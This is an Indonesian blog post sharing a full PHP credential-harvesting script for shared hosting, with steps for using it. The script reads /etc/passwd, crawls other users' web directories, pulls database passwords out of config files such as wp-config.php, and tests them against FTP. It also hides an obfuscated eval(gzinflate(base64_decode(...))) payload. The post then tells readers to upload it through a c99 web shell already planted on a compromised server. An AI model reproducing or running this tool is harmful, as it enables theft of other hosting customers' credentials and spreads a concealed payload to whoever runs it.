Hello gan, Nie gue sedikit pengen bagi2 source buat get pass cpanel hosting, yg mungkin bisa ngebantu temen2 semua buat cari user dan password cpanel.
LANGSUNG AJA GAN
Copy semua source yg ada ok...!
<HTML><HEAD><TITLE>Ftp Killer By QuantuM_QueeN & Mask_magicianZ</TITLE></HEAD><?php
/*
Brainfuck
Edited by BLACK_MASK
(c) http://p-range.info
*/
echo '<html><head><title>BLACK_MASK</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
read_dir($path,$user);
}
echo "\n[+] Done\n";
function read_dir($path,$username)
{
if ($handle = opendir($path))
{
while (false !== ($file = readdir($handle)))
{
$fpath = "$path$file";
if (($file != '.') and ($file != '..'))
{
if (is_readable($fpath))
{
$dr = $fpath."/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
if (
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='configuration.php')
or ($file=='wp_config.php')
or ($file=='wp-config.php')
or ($file=='inc.php')
or ($file=='setup.php')
or ($file=='dbconf.php')
or ($file=='dbconfig.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='connect.php')
or ($file=='common.php')
or ($file=='config_global.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
or ($file=='e107_config.php')
or ($file=='dbconnect.inc.php'))
{
$pass = get_pass($fpath);
if ($pass != '')
{
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link)
{
@$config = fopen($link,'r');
while(!feof($config))
{
$line = fgets($config);
if (strstr($line,'pass')
or strstr($line,'pwd')
or strstr($line,'db_pass')
or strstr($line,'dbpass')
or strstr($line,'passwd'))
{
if (strrpos($line,'"'))
{
preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
$pass = str_replace("]=\"","",$pass);
}
else
preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
$pass = str_replace("]='","",$pass);
return $pass[2];
}
}
}
function ftp_check($login,$pass)
{
@$ftp = ftp_connect('127.0.0.1');
if ($ftp)
{
@$res = ftp_login($ftp,$login,$pass);
if ($res)
{
echo '[FTP] '.$login.':'.$pass." Success !\n\n";
eval(gzinflate(base64_decode('rVPBbtswDL0b8D9ohoEmgFtUzmVo1qHDkC49rDPiZId2RaDITOrVEQ3JQdEN+6D95UTJSbHB2cnxQeIj3yMjknGBW1EqdsniZT6ZfZ3M7k+m83m2nH7J5ycP4zCI65Rbd8r9PaV76u/nb51lD7Kld64NyiesQQ1ir50QK4lBa4XuMI1O+Pmw5fBjHH6c4xN3sqyrm0dfuR68cXUOw+BnLPhlNNEadTT+FQZQGdij+U5KMCYar2WFBgaeQ1GvGtxrpJ0aabcG/0fDFutVRp0qo24VYnkd6oKxzYvC4LSv3zcVBh9roaBii7oQDbAbtUZ2X+MzaCjY6oV9WtzcTnI2A4kFEPBZmKflVmxKWQp1xx4YifRa0RRNwy5Y22hCFgY0IRVuPJAJYwio7dl7/g+2DXXDMtSN+3N5PrW5nGknhpDrefaKpITIzL3iARz1XtVvu3yct/1I/urCD5v10LCZHZ2VUEXZ3PVcQ0Qb2aDdxkiozaYEgVpcvYhHxDOJW+fWIMv6vxFmt/oOsqGY9tHovU3eTqCLeQRRgDYUc61xe8F2zvdOwbO5kvWpN89KO6zviWDnpBrY0pK9ekK7kux1hocQV97RqD8=')));
echo '[SSH] Port' .':' .$a1. " !\n\n";
echo '[FTP] Port' .':' .$a2. " !\n\n";
echo '[cPanel] Port' .':' .$a3. " !\n\n";
}
else ftp_quit($ftp);
}
}
echo '</textarea><br><br><b>cPaneL Bruteforce Recode By Mask_magicianz Powered by RosebanditZ</b></body></html>';
?>
Setelah di Copy atau Ctrl +A - Ctrl +C Lalu paste di notped kedalam bentuk .php supaya gk lama command di shell nya. misal menjadi file cp.php
lalau upload file trsebut kedalam shell injeck anda, setelah qm upload trus open newtab pada mozila anda
copy file cp.php trsbut dan gabungkan pada link shell anda.
exemple: misal shell bentuk c99 http://zen-ahmad.blogspot.com/view.php enah setelah anda uploading source cpanel trusebut trus copy file cpanelx. misal menjadi http://zen-ahmad.blogspot.com/cp.php <=-- lalu browser aja tunggu sampei selesai OK!
SELAMAT MENCOBA...
Tidak ada komentar:
Posting Komentar